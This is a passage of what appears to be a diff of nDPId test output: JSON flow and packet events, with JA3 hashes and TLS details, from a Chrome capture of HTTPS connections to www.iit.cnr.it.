-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620902509273,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509273,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuZAbt3hYKuAAAAALAC\/\/\/l6gAAAgQFtAEDAwUBAQgKM3SXeAAAAAAEAgAA"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509274,"flow_last_seen":1620902509274,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509274,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1620902509274,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509274,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuaAbt39JnFAAAAALAC\/\/\/OYgAAAgQFtAEDAwUBAQgKM3SXeQAAAAAEAgAA"} 
-00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902509276,"flow_last_seen":1620902509276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902509276,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1620902509276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902509276,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvubAbvm4fjEAAAAALAC\/\/8AcwAAAgQFtAEDAwUBAQgKM3SXewAAAAAEAgAA"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5l1X2J5d4WCr6AS\/ojLGgAAAgQFrAQCCAo6mxrNM3SXeAEDAwc="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuZAbt3hYKvdV9ieoAQECzoIAAAAQEICjN0l5M6mxrN"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5gJQMJ043dmE6AS\/oiH6wAAAgQFrAQCCAo6mxrLM3SXeAEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuYAbvjd2YTCUDCdYAQECyk8QAAAQEICjN0l5M6mxrL"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509302,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5p\/iAsOd\/SZxqAS\/ogA1gAAAgQFrAQCCAo6mxrMM3SXeQEDAwc="} 
-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620902509302,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509302,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuaAbt39JnGf4gLD4AQECwd3QAAAQEICjN0l5M6mxrM"} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902509303,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+5sh1fPg5uH4xaAS\/oinwwAAAgQFrAQCCAo6mxrPM3SXewEDAwc="} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902509303,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvubAbvm4fjFIdXz4YAQECzEywAAAQEICjN0l5Q6mxrP"} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509273,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509272,"flow_last_seen":1620902509303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902509303,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":116,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509274,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902509276,"flow_last_seen":1620902509304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902509304,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":128,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509273,"flow_last_seen":1620902509333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509333,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509272,"flow_last_seen":1620902509335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902509335,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":136,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509276,"flow_last_seen":1620902509338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509338,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":143,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902509274,"flow_last_seen":1620902509342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902509342,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":862,"flow_first_seen":1620902507870,"flow_last_seen":1620902514626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":687973,"flow_avg_l4_payload_len":798,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1134,"flow_first_seen":1620902508740,"flow_last_seen":1620902515037,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":930115,"flow_avg_l4_payload_len":820,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":376,"flow_first_seen":1620902509272,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":297726,"flow_avg_l4_payload_len":791,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64408,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":956,"flow_first_seen":1620902509273,"flow_last_seen":1620902515019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":773272,"flow_avg_l4_payload_len":808,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64409,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1106,"flow_first_seen":1620902509274,"flow_last_seen":1620902515040,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":914291,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64410,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5633,"source":"chrome.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1199,"flow_first_seen":1620902509276,"flow_last_seen":1620902515049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1009870,"flow_avg_l4_payload_len":842,"midstream":0,"thread_ts_msec":1620902515049,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902507870,"flow_last_seen":1620902507870,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902507870,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620902507870,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902507870,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuJAbsdWbUDAAAAALAC\/\/8TEgAAAgQFtAEDAwUBAQgKM3SSOAAAAAAEAgAA"} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902507899,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4lEvFS6HVm1BKAS\/og8HwAAAgQFrAQCCAo6mxVSM3SSOAEDAwc="} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902507899,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuJAbsdWbUERLxUu4AQECxZJAAAAQEICjN0klQ6mxVS"} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902507870,"flow_last_seen":1620902507899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1620902507899,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"chrome.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902507870,"flow_last_seen":1620902507935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1620902507935,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64393,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"aa50c12a5dfa717d9d6ab34e97de79d5","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620902508740,"flow_last_seen":1620902508740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620902508740,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1620902508740,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1620902508740,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EvuKAbtgbcSnAAAAALAC\/\/+8\/wAAAgQFtAEDAwUBAQgKM3SVkQAAAAAEAgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620902508769,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7+4peZebaYG3EqKAS\/og23AAAAgQFrAQCCAo6mxi5M3SVkQEDAwc="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620902508769,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EvuKAbtgbcSoXmXm24AQECxT5gAAAQEICjN0lag6mxi5"} +00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620902508740,"flow_last_seen":1620902508769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":635,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1620902508769,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"1b73862eae8f1711440a446b1ef357fd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00935{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":49,"source":"chrome.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620902508740,"flow_last_seen":1620902508800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":635,"flow_tot_l4_payload_len":895,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1620902508800,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":64394,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
